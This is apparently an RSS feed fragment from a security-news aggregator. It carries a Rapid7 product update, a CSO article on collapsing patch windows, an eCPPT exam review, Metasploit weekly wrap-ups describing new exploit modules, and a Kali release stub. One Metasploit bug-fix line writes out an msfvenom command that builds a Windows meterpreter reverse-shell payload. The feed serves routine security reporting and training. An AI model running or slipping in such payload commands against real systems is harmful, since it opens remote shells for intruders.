assets, vulnerabilities, remediations and agent-based policy data, resulting in more flexible reporting and querying.</span></p><h4><span>Data Security Posture Management (DSPM)</span></h4><p><span>Understanding which exposures threaten sensitive data is difficult when data security and exposure insights live in separate tools. A partnership between Rapid7 and Symmetry Systems brings those perspectives together on Exposure Command, aligning sensitive data intelligence with real attacker reachability. DSPM capabilities discover sensitive data and map identity access, helping teams prioritize remediation based on breach impact.</span></p><p><a href="https://www.rapid7.com/blog/post/em-protect-breaches-align-sensitive-data-with-exposure-risk/" target="_blank"><span>Read the blog</span></a><span> to learn how aligning data and exposure reduces breach risk.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt23c406d93e266e6e/69d7a2281e99fb6ebb869941/automated-sensitive-data-discovery.png" alt="automated-sensitive-data-discovery.png" caption="Automated Sensitive Data Discovery: See how PII, PHI and Financial Data is flagged" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="automated-sensitive-data-discovery.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt23c406d93e266e6e/69d7a2281e99fb6ebb869941/automated-sensitive-data-discovery.png" data-sys-asset-uid="blt23c406d93e266e6e" data-sys-asset-filename="automated-sensitive-data-discovery.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Automated Sensitive Data Discovery: See how PII, PHI and Financial Data is flagged" data-sys-asset-alt="automated-sensitive-data-discovery.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Automated Sensitive Data Discovery: See how PII, PHI and Financial Data is flagged</figcaption></div></figure><h2>Attack surface management</h2><h3><span>Dynamic External Attack Surface Discovery</span></h3><p><span>Your attack surface doesn’t stand still, and point-in-time visibility can leave teams chasing what’s already changed. Dynamic EASM Discovery helps Surface Command automatically identify and track changes across the external attack surface by ingesting domain and IP data from across the environment. The result is more current visibility, fewer blind spots, and stronger confidence that teams are prioritizing and validating the exposures that matter most.</span></p><p><a href="https://www.rapid7.com/blog/post/pt-dynamic-easm-discovery-continuous-discovery-for-a-changing-attack-surface/" target="_blank"><span>Read the blog</span></a><span> to see how Dynamic EASM Discovery helps teams keep pace with a changing attack surface.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt38e0451d9f6c6b5d/69d7a312a6871931393acc66/rapid7-command-platform-easm-seed-data.png" alt="rapid7-command-platform-easm-seed-data.png" caption="The Rapid7 Command Platform displaying your EASM seed data" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="rapid7-command-platform-easm-seed-data.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt38e0451d9f6c6b5d/69d7a312a6871931393acc66/rapid7-command-platform-easm-seed-data.png" data-sys-asset-uid="blt38e0451d9f6c6b5d" data-sys-asset-filename="rapid7-command-platform-easm-seed-data.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="The Rapid7 Command Platform displaying your EASM seed data" data-sys-asset-alt="rapid7-command-platform-easm-seed-data.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>The Rapid7 Command Platform displaying your EASM seed data</figcaption></div></figure><h2>Platform and Labs</h2><h3><span>Rapid7 Command Platform</span></h3><p><span>We’re excited to introduce a centralized way to programmatically access data across all managed tenants with new multi-tenant API keys. For organizations managing multiple environments, tenants, or customers, integrating with each one individually has traditionally required significant manual effort, creating, maintaining, and rotating separate API keys for every tenant. This not only slows down development but also increases operational overhead and the risk of inconsistency. </span></p><p><span>With this new capability, you can build a single integration that seamlessly “loops” through tenants automatically, enabling consistent data access and streamlined workflows at scale. Whether you’re aggregating data for reporting, powering automation, or integrating with third-party tools, multi-tenant API keys simplify the process and reduce complexity, freeing up your teams to focus on higher-value tasks instead of repetitive configuration. Read all about it in our </span><a href="https://www.rapid7.com/blog/post/pt-multi-tenant-api-access-centralized-scaled-secured-operations/" target="_blank"><span>blog</span></a><span>. </span></p><h3><span>Rapid7 Labs</span></h3><h4><span>The latest threat research reports from Rapid7 Labs</span></h4><p><span>This quarter Rapid7 Labs continued to deliver critical insights into the evolving threat landscape, uncovering how attackers are adapting their tactics – from stealthy, long-term intrusions to increasingly targeted and data-driven attacks. Our latest research reports highlight the growing complexity of modern threats and the real-world risks facing organizations today. Explore the findings below to better understand what’s changing and what it means for your security strategy.</span></p><ul><li><p><a href="https://www.rapid7.com/blog/post/tr-bpfdoor-telecom-networks-sleeper-cells-threat-research-report/" target="_blank"><span><strong>BPFdoor in Telecom Networks: Sleeper Cells in the Backbone</strong></span></a><span><strong>: </strong></span><span>Rapid7 uncovered a long-running espionage campaign in which a China-nexus threat actor, Red Menshen, embedded stealthy “sleeper cells” inside global telecommunications networks using the BPFdoor backdoor. Operating at the Linux kernel level, this malware enables persistent, hard-to-detect access without typical network signals, allowing attackers to monitor communications, subscriber data, and critical infrastructure over time. The research highlights a shift from opportunistic attacks to deliberate, long-term pre-positioning inside core systems that underpin global connectivity, raising national-level risk.</span></p></li><li><p><a href="https://www.rapid7.com/research/report/global-threat-landscape-report-2026/" target="_blank"><span><strong>2026 Global Threat Landscape Report</strong></span></a><span><strong>: </strong></span><span>The latest report from Rapid7 Labs delivers an in-depth analysis of global adversary behavior, drawing on telemetry from Rapid7 MDR investigations, vulnerability intelligence, and frontline incident response. This year’s findings highlight a rapidly evolving threat environment, marked by the collapse of the window between vulnerability disclosure and exploitation, the continued industrialization of ransomware operations, and the acceleration of modern attacks through the use of AI.</span></p></li></ul><ul><li><p><a href="https://www.rapid7.com/lp/executive-digital-footprints-threat-report/" target="_blank"><span><strong>Executives’ Digital Footprints Threat Report</strong></span></a><span><strong>: </strong></span><span>Today, 60% of an executive’s digital risk exposure is retrievable through surface web searches, including public records, professional history, and social media activity — all of which can be weaponized for highly targeted attacks. The Executive Digital Footprints Threat Report from Rapid7 Labs details how these executive digital footprints are an often overlooked threat vector that can be exploited, posing risks to the executive, their families, and organizations.</span></p></li></ul><h4><span>Exposing the Chrysalis Backdoor</span></h4><p><span>Last month, Rapid7 uncovered the Chrysalis backdoor, a sophisticated supply chain attack that leveraged the Notepad++ update mechanism to selectively target organizations with a stealthy, persistent backdoor. This discovery highlights the growing risk of trusted software being weaponized and the real-world impact of advanced, targeted campaigns that can evade traditional defenses, reinforcing the importance of continuous monitoring and validating third-party software behavior in today’s threat landscape. Learn more about the Chrysalis backdoor </span><a href="https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/" target="_blank"><span>here</span></a><span>, and see more details on its impact and what you can do next </span><a href="https://www.rapid7.com/blog/post/tr-chrysalis-notepad-supply-chain-risk-next-steps/" target="_blank"><span>here</span></a><span>.</span></p><h4><span>Cyber threat activity related to the Iran conflict</span></h4><p><span>Rapid7 is actively monitoring cyber threat activity related to the Iran conflict, providing support for our customers and the cybersecurity community. Review observed activity, official advisories, and recommended defensive actions </span><a href="https://www.rapid7.com/research/iran-conflict-cyber-threats/" target="_blank"><span>here</span></a><span>.</span></p><h4><span>Announcing Metasploit Pro 5.0.0</span></h4><p><span>We’re excited to announce the launch of Metasploit Pro 5.0.0, a major evolution in red-team and penetration testing. Built to address today’s dynamic threat landscape, this release delivers a significantly improved UI, usability, validation, and workflow improvements that empower security teams to validate vulnerabilities faster and more effectively. Learn more in our blog post </span><a href="https://www.rapid7.com/blog/post/pt-announcing-metasploit-pro-5-penetration-testing-evolving/" target="_blank"><span>here</span></a><span>.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc96aff140b3c8ec4/69d7a36de583e64584f06dc5/newly-designed-metasploit-interface.png" alt="newly-designed-metasploit-interface.png" caption="Newly designed interface of Metasploit Pro" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="newly-designed-metasploit-interface.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc96aff140b3c8ec4/69d7a36de583e64584f06dc5/newly-designed-metasploit-interface.png" data-sys-asset-uid="bltc96aff140b3c8ec4" data-sys-asset-filename="newly-designed-metasploit-interface.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Newly designed interface of Metasploit Pro" data-sys-asset-alt="newly-designed-metasploit-interface.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Newly designed interface of Metasploit Pro</figcaption></div></figure><h2>We’re just getting started</h2><p><span>The innovation doesn’t stop here. We have a strong pipeline of product enhancements and new capabilities rolling out all year long. Be sure to follow our </span><a href="https://www.rapid7.com/blog/" target="_blank"><span>blog</span></a><span> and </span><a href="https://docs.rapid7.com/insight/command-platform-release-notes/" target="_blank"><span>release notes</span></a><span> to see how Rapid7 continues to advance our platform and deliver greater value.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Patch windows collapse as time-to-exploit accelerates]]></title>
<description><![CDATA[The gap between vulnerability disclosure and exploitation is drastically decreasing, putting security teams’ patching practices on notice.



According to Rapid7’s latest Cyber Threat Landscape Report, confirmed exploitation of newly disclosed high- and critical-severity vulnerabilities (CVSS 7-1...]]></description>
<link>https://tsecurity.de/de/3419824/it-security-nachrichten/patch-windows-collapse-as-time-to-exploit-accelerates/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3419824/it-security-nachrichten/patch-windows-collapse-as-time-to-exploit-accelerates/</guid>
<pubDate>Thu, 09 Apr 2026 11:21:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The gap between vulnerability disclosure and exploitation is drastically decreasing, putting security teams’ patching practices on notice.</p>



<p>According to <a href="https://www.rapid7.com/research/report/global-threat-landscape-report-2026/">Rapid7’s latest Cyber Threat Landscape Report</a>, confirmed exploitation of newly disclosed high- and critical-severity vulnerabilities (CVSS 7-10) increased 105% year to 146 in 2025, up from 71 in 2024.</p>



<p>Moreover, the median time from vulnerability publication to CISA Known Exploited Vulnerabilities (KEV) inclusion dropped from 8.5 days to 5.0 days, with mean time-to-exploit dropping from 61.0 days to 28.5 days. Zero-day exploits have <a href="https://www.csoonline.com/article/4141519/zero-day-exploits-hit-enterprises-faster-and-harder.html">also been hitting enterprises faster and harder</a>, according to a recent report from Google Threat Intelligence Group.</p>



<p>The result is a threat ecosystem that sees twice as many high-impact flaws exploited in half the time — a troubling development for cyber defense.</p>



<h2 class="wp-block-heading">Cybercrime industrial complex</h2>



<p>Industrialization of the cybercrime ecosystem and increased abuse of AI tools to find and exploit vulnerabilities are key drivers of the increased pace of vulnerability exploitation, according to Rapid7 and other industry observers quizzed by CSO.</p>



<p>“Initial access brokers now sell directly to ransomware groups, creating a clear incentive to weaponize new vulnerabilities, harvest credentials, and monetize access,” says <a href="https://www.linkedin.com/in/stephenfewer/">Stephen Fewer</a>, senior principal researcher at Rapid7, the firm behind the popular Metasploit penetration-testing tool. “This has accelerated both the pace and sophistication of their operations.”</p>



<p>For attackers, familiarity with the target and the technologies involved can greatly reduce the challenge of developing exploits — a factor that is driving repeated exploitation of many enterprise software targets.</p>



<p>AI adoption is another important factor in the increased pace of vulnerability discovery and exploitation because it <a href="https://www.csoonline.com/article/3632268/gen-ai-is-transforming-the-cyber-threat-landscape-by-democratizing-vulnerability-hunting.html">facilitates the process of uncovering software bugs</a>.</p>



<p>“It [AI] enables threat actors to close skill gaps and significantly increases operational throughput,” Fewer says. “In practice, AI provides a tactical advantage in analyzing newly disclosed vulnerabilities and generating exploit code at speed.”</p>



<h2 class="wp-block-heading">N-day exploitation</h2>



<p>Rapid7 Labs validated its findings about a more febrile threat environment by producing both n-day and zero-day exploits using AI-assisted research, substantially reducing development time.</p>



<p>In practice, n-day bugs — or the development of exploits against patched software — are a bigger problem than headline-grabbing zero-day vulnerabilities, adds Leeann Nicolo, incident response lead at Coalition, a technology firm that specializes in cyber insurance and cybersecurity tools.</p>



<p>“Our incident response team hasn’t seen a lot of zero-day vulnerabilities exploited lately. Instead, threat actors are hitting known issues that already have patches,” Nicolo says.</p>



<p>Other industry experts confirmed that Rapid7’s findings reflect what they too are seeing on the ground.</p>



<p>“The patch window has effectively collapsed,” says <a href="https://www.veracode.com/leadership/chris-wysopal/">Chris Wysopal</a>, co-founder and chief security evangelist at application security firm Veracode. “That is not a gradual trend; it’s a structural break.”</p>



<p>One driver for the increased pace of exploitation is that every patch now acts like a roadmap for attackers, Wysopal says.</p>



<p>“Once a fix ships, attackers can differentiate the patch, isolate the vulnerable code path, and use automation and AI to generate working exploit paths far faster than enterprises can test and deploy the fix,” says Wysopal. “In other words, disclosure increasingly starts the race, and defenders are already behind when the starting gun fires.”</p>



<p>In addition, <a href="https://www.csoonline.com/article/3842489/companies-are-drowning-in-high-risk-software-security-debt-and-the-breach-outlook-is-getting-worse.html">AppSec debt</a> widens the exposure window even when a patch exists.</p>



<p>“Enterprises are still carrying too much legacy code, too many internet-facing dependencies, and too many fragile change processes to remediate at machine speed,” Wysopal says. “If the organization needs days or weeks to inventory exposure, assess blast radius, test, get approvals, and deploy, then it is operating on a calendar while attackers are operating on a clock.”</p>



<p>Another big issue is the industrialization of vulnerability exploitation.</p>



<p>AI compresses exploit development and lowers the skill barrier, while the cybercrime market removes friction by creating a well-oiled production line that incorporates researchers, brokers, access sellers, botnet operators, and ransomware affiliates.</p>



<p>“[This] assembly-line model means more vulnerabilities move from disclosure to usable attack paths almost immediately,” according to Wysopal.</p>



<h2 class="wp-block-heading">Secure-by-design imperative</h2>



<p>The real response to these challenges ought to be in reducing the amount of exploitable software reaching production in the first place rather than encouraging CISOs to “patch faster.”</p>



<p>Secure-by-design engineering, aggressive pre-release testing by top-tier bug hunters, architectural mitigations that shrink whole bug classes, and the ability to rebuild or isolate exposed systems quickly are all necessary but perhaps insufficient.</p>



<p>The old assumption that defenders get a grace period after disclosure is no longer credible, according to Wysopal.</p>



<p>“We are watching the collapse of the traditional patch window in real-time,” Wysopal emphasizes. “Secure by design is the only sustainable response, because once disclosure happens, the attacker’s clock is already ticking.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[My eCPPTv3 Exam Review]]></title>
<description><![CDATA[بسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِGreetings everyone. Today I’ll be writing my own personal experience and review of INE’s Certified Professoinal Penetration Tester (eCPPT) exam. I’ll also give some tips / advice as well as what to expect in the exam. I spent the full 24-hour exam window, wi...]]></description>
<link>https://tsecurity.de/de/3419636/hacking/my-ecpptv3-exam-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3419636/hacking/my-ecpptv3-exam-review/</guid>
<pubDate>Thu, 09 Apr 2026 10:07:55 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/788/1*VTpbJYLreJC6HCwJffyrxg.png"></figure><p>بسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ</p><p>Greetings everyone. Today I’ll be writing my own personal experience and review of INE’s Certified Professoinal Penetration Tester (eCPPT) exam. I’ll also give some tips / advice as well as what to expect in the exam. I spent the full 24-hour exam window, with around 14–15 hours actively working on the exam after accounting for sleep, ended up passing with a score of 82%, in order to pass the exam you would need a score of at least 70%. The exam consists of 45 questions. You get your results immediately after submitting. Let’s roll.</p><h3>Overview of the training / Course</h3><p>The course / training is a clear step-up from the eJPTv2 course. I completed the full eCPPT course / training then dived into <a href="https://hacktheboxltd.sjv.io/19ZM06">hackthebox</a> and finished two modules:<strong> introduction to active directory and active directory enumeration and attacks</strong>. Unfortunately unlike the eJPTv2, the training from ine is not enough to pass the exam as it contains gaps especially in the Active Directory section, but that doesn’t mean that the exam would be easy, while the content may not fully prepare you for the exam, it’s challenging-especially if you’re new to AD pentesting and privilege escalation.</p><h3>What to Study if the training is not enough?</h3><p>Here’s what you’ll need to supplement the INE course:</p><h4>Active Directory</h4><ul><li>Introduction to Active Directory (<a href="https://academy.hackthebox.com/course/preview/introduction-to-active-directory">Link</a> — <a href="https://hacktheboxltd.sjv.io/19ZM06">HackTheBox</a>)</li><li>Active Directory Enumeration &amp; Attacks (<a href="https://academy.hackthebox.com/course/preview/active-directory-enumeration--attacks">Link</a> — <a href="https://hacktheboxltd.sjv.io/19ZM06">HackTheBox</a>)</li><li>There are also other AD Modules in the HTB CPTS path (<a href="https://academy.hackthebox.com/preview/certifications/htb-certified-penetration-testing-specialist">Link</a>)</li><li>Learn how to use the Impacket AD Tools</li></ul><h4>Web App</h4><ul><li>Wordpress Course (<a href="https://academy.hackthebox.com/course/preview/hacking-wordpress">Link</a> — <a href="https://hacktheboxltd.sjv.io/19ZM06">HackTheBox</a>)</li><li>As many web app rooms as possible on <a href="https://tryhackme.com/">TryHackMe</a></li></ul><h3>What to Skip in the training</h3><blockquote>Note: read this section if you are interested in taking the exam ASAP and don’t want to waste time by studying things that you will not need in the exam or are planning to study them after passing the exam.</blockquote><ul><li>Client-Side Attacks</li><li>System Security &amp; x86 Assembly Fundamentals</li><li>Exploit Development: Buffer Overflows</li><li>Command &amp; Control (C2/C&amp;C)</li></ul><blockquote>Note: It’s really important to come back to these sections and study them as they are very important and still relevant to this day.</blockquote><h3>The Exam Environment / lab</h3><p>First, When starting the exam you will be provided with access to a pre-configured kali linux machine through the browser meaning you will not be able to use your own machine through a vpn connection. Second, the lab provides you with most tools that you would need to pass the exam, except for some like Evil-WinRM which didn’t work for some reason. Third, you might notice that the lab may occasionally fail to display output for certain commands or tools (e.g., kerbrute, smbexec, hydra), in reality, the output is displayed as black text on a black background, making it seem invisible, which can be annoying. When this occurs, copying the output into your own notes or machine can allow you to see the results correctly. (Don’t worry this only happens with a couple of tools).</p><p>Below are some of the tools I used in the exam:</p><p><strong>Nmap, Kerbrute, Hydra, Metasploit, Hashcat, John, Burp Suite, rppclient, smbclient, mysql, impacket-GetNPUsers, Crackmapexec, Bloodhound, xfreerdp, PowerView.ps1, PowerUp.ps1, mimikatz.exe, searchsploit, python3.</strong></p><h3>The Exam Flaws</h3><ol><li><strong>Lab Stability</strong><br> As the exam is relatively new, the environment may occasionally be unstable. In some cases, the lab would suddenly disconnect forcing you to restart the lab. Another thing is I encountered a task requiring me to locate a specific user on a machine, but the user did not exist until I reset the lab environment. It is advisable to keep this in mind and consider resetting the lab if something seems inconsistent.</li></ol><p><strong>2. Password Lists</strong><br> The password lists provided in the letter of engagement can be misleading and are generally not effective for cracking or brute-forcing. Instead, it is recommended to use more reliable lists such as:</p><ul><li>xato-net-10-million-passwords-10000.txt</li><li>seasons.txt</li><li>months.txt</li></ul><p><strong>3. Tool Problems</strong><br>As also stated from other people, certain tools, such as Evil-WinRM, may not function properly on the provided attacker machine, even though ine stated in the letter engagement that you would need to use the docker version, which still didn’t work for me, and i didn’t know if i was doing something wrong (maybe it’s a skill issue lol).</p><h3>What to Expect</h3><p>1- The exam focuses heavily on Active Directory which is no surprise.</p><p>2- Enumeration, bruteforcing and password spraying is a MUST.</p><p>3- Linux machines are also present, which you would need to exploit and escalate your privileges on.</p><p>4- A web application to exploit and test.</p><p>5- A LOT of hash cracking.</p><p>6- Advanced Windows privilege escalation. (Probably the hardest part of the exam as many people get stuck here).</p><p>7- Public exploits / CVEs. Not everything in the exam has to be done inside, you will have to perform some research for public exploits to answer some questions.</p><h3>Overall Advice</h3><ol><li>NOTES. Taking notes in this exam is a life saver, just like you should in any other pentesting exam. I made a big mistake in the last half of the exam by deciding to ditch the note taking and focus on the exam as i noticed that i wasn’t answering alot of questions. Don’t do that.</li><li>Don’t panic, 24 hours is more than enough for you to pass the exam.</li><li>Enumeration and bruteforcing is key.</li></ol><p>4. Get good and familiar with active directory by studying the modules i mentioned above.</p><p><strong>Ready to level up your hacking skills?</strong></p><p><strong>Join </strong><a href="https://hacktheboxltd.sjv.io/19ZM06"><strong>Hack The Box</strong></a><strong> — the ultimate platform to learn penetration testing and cybersecurity hands-on.</strong></p><p><strong>👉 Start hacking </strong><a href="https://hacktheboxltd.sjv.io/19ZM06"><strong><em>here</em></strong></a><strong> and get access to real-world labs, challenges, and career-boosting skills.</strong></p><p><a href="https://hacktheboxltd.sjv.io/19ZM06">HTB Account</a></p><h3>My Own Opinion</h3><p>While I stated above that there are some flaws such as not being able to use your own machine through a vpn, the lab not being stable, as well as the training not being enough, I also have to give credit to INE for the training and their exam, its decent overall and forces you to think more and outisde the box instead of having everything handed to you. I enjoyed this course alot more than the eJPT which felt very boring and repitive at that time, I also enjoyed the exposure to new areas such as Assembly and C2 frameworks. However, these sections are only covered at a basic level, and expanding on them would make the overall course amazing. Thanks to INE for giving me the opportunity to take this exam. If you have any questions feel free to reach out for me on my Linkedin:</p><p><a href="https://linkedin.com/in/qaishammad%5C">My Linkedin</a></p><p>That’s it! Best of luck!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=e5d57dc1ff78" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/my-ecpptv3-exam-review-e5d57dc1ff78">My eCPPTv3 Exam Review</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 04/03/2026]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3406266/it-security-nachrichten/metasploit-wrap-up-04032026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3406266/it-security-nachrichten/metasploit-wrap-up-04032026/</guid>
<pubDate>Fri, 03 Apr 2026 21:21:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[FreeScout Unauthenticated RCE via ZWSP .htaccess Bypass]]></title>
<description><![CDATA[Topic: FreeScout Unauthenticated RCE via ZWSP .htaccess Bypass Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/3397333/sicherheitsluecken/freescout-unauthenticated-rce-via-zwsp-htaccess-bypass/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3397333/sicherheitsluecken/freescout-unauthenticated-rce-via-zwsp-htaccess-bypass/</guid>
<pubDate>Tue, 31 Mar 2026 21:51:03 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: FreeScout Unauthenticated RCE via ZWSP .htaccess Bypass Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 03/27/2026]]></title>
<description><![CDATA[Better NTLM Relaying FunctionalityThis week’s release brings an improvement to the SMB NTLM relay server. In the past, it’s support has been expanded with modules for relaying to HTTP (ESC8), MSSQL and LDAP while still receiving connections over the humble SMB service. Prior to this release, clie...]]></description>
<link>https://tsecurity.de/de/3387725/it-security-nachrichten/metasploit-wrap-up-03272026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3387725/it-security-nachrichten/metasploit-wrap-up-03272026/</guid>
<pubDate>Fri, 27 Mar 2026 22:21:42 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p></p><h2>Better NTLM Relaying Functionality</h2><p>This week’s release brings an improvement to the SMB NTLM relay server. In the past, it’s support has been expanded with modules for relaying to HTTP (ESC8), MSSQL and LDAP while still receiving connections over the humble SMB service. Prior to this release, clients required a key behavior in how they handled SMB’s STATUS_NETWORK_SESSION_EXPIRED error code, in order to relay a single authentication attempt to multiple targets. Most clients other than Window’s “net use” do not handle these errors and were thus incompatible with Metasploit SMB NTLM relaying capabilities. Now, when a single target is specified, Metasploit alters its relaying strategy to forward the Net-NTLM messages immediately, making it compatible with a broader range of clients including Linux’s smbclient. In addition, the client in RubySMB was updated to mimic the behaviour of “net use” allowing authentication attempts from RubySMB to be relayed to multiple targets successfully.</p><h2>New module content (3)</h2><h3>ESC/POS Printer Command Injector</h3><p>Author: FutileSkills</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20478">#20478</a> contributed by <a href="https://github.com/futileskills">futileskills</a></p><p>Path: admin/printer/escpos_tcp_command_injector</p><p>Description: Adds a new auxiliary module that exploits CVE-2026-23767, an unauthenticated ESC/POS command vulnerability in networked Epson-compatible printers. The vulnerability allows an attacker to send crafted commands over the network to inject custom ESC/POS print commands, which are used in various receipt printers.</p><h3>Eclipse Che machine-exec Unauthenticated RCE</h3><p>Authors: Greg Durys <a href="mailto:gregdurys.security@proton.me">gregdurys.security@proton.me</a> and Richard Leach</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20835">#20835</a> contributed by <a href="https://github.com/GregDurys">GregDurys</a></p><p>Path: linux/http/eclipse_che_machine_exec_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-12548&amp;referrer=blog">CVE-2025-12548</a></p><p>Description: This adds a module for CVE-2025-12548, an unauthenticated RCE in the Eclipse Che machine-exec service. The vulnerability allows attackers to connect over WebSocket on port 3333 and execute commands via JSON-RPC without authentication. This affects Red Hat OpenShift DevSpaces environments.</p><h3>Barracuda ESG TAR Filename Command Injection</h3><p>Authors: Curt Hyvarinen, Mandiant, and cfielding-r7</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21033">#21033</a> contributed by <a href="https://github.com/Alpenlol">Alpenlol</a></p><p>Path: linux/smtp/barracuda_esg_tarfile_rce AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2023-2868&amp;referrer=blog">CVE-2023-2868</a></p><p>Description: Adds exploit module for CVE-2023-2868, a command injection vulnerability in Barracuda Email Security Gateway (ESG) appliances. Filenames in TAR attachments are passed to shell commands without sanitization, allowing RCE via backtick injection.</p><h2>Enhancements and features (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21049">#21049</a> from <a href="https://github.com/h00die">h00die</a> - This updates post modules to use an API that will expand multiple environment variables when set within the WritableDir option.</li></ul><h2>Bugs fixed (5)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20967">#20967</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - This fix an issue that prevents successful authentication relay from Ruby SMB Client and smbclient. These clients are now compatible with Msf::Exploit::Remote::SMB::RelayServer.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21148">#21148</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a bug where setting VERBOSE logging as false globally would still cause verbose logging to occur.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21169">#21169</a> from <a href="https://github.com/SaiSakthidar">SaiSakthidar</a> - This fixes a bug that was preventing Mach-O binaries from being identified due to a Ruby string encoding compatibility problem.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21173">#21173</a> from <a href="https://github.com/msutovsky-r7">msutovsky-r7</a> - Fixes a crash when attempting to generate a vbs payload with msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=44 -f vbs.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21174">#21174</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a bug when parsing msfconsole's -x flag when additional semicolons are present that are not meant to separate commands. i.e. msfconsole -x 'set option_name "a;b"'.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-03-18T23%3A56%3A12Z..2026-03-26T11%3A49%3A13Z%22">Pull Requests 6.4.123...6.4.124</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.123...6.4.124">Full diff 6.4.123...6.4.124</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali Linux 2026.1 Launches with 8 New Tools, UI Refresh, and Kernel Upgrade]]></title>
<description><![CDATA[Kali Linux continues to evolve as a leading platform for penetration testing, and its latest release, Kali Linux 2026.1, introduces a mix of visual updates, new tools, and system-level improvements. This release not only refines the user experience but also pays tribute to its roots in BackTrack,...]]></description>
<link>https://tsecurity.de/de/3382224/it-security-nachrichten/kali-linux-20261-launches-with-8-new-tools-ui-refresh-and-kernel-upgrade/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3382224/it-security-nachrichten/kali-linux-20261-launches-with-8-new-tools-ui-refresh-and-kernel-upgrade/</guid>
<pubDate>Thu, 26 Mar 2026 07:20:38 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
